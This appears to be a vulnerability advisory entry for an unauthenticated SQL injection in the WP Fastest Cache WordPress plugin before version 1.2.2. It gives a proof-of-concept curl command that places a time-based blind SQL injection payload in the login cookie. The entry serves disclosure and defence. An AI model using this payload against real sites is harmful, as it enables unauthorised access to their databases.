WordPress Plugin Vulnerabilities
WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
Proof of Concept
1. Visit WP Fastest Cache > Settings. Ensure "Cache System" is enabled, and "Logged-in Users" is disabled. Click "Submit" at the bottom. 2. The following curl command demonstrates the SQLi: curl https://example.com -H "Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-13 (about 6 months ago)
Added
2023-11-13 (about 5 months ago)
Last Updated
2023-11-14 (about 5 months ago)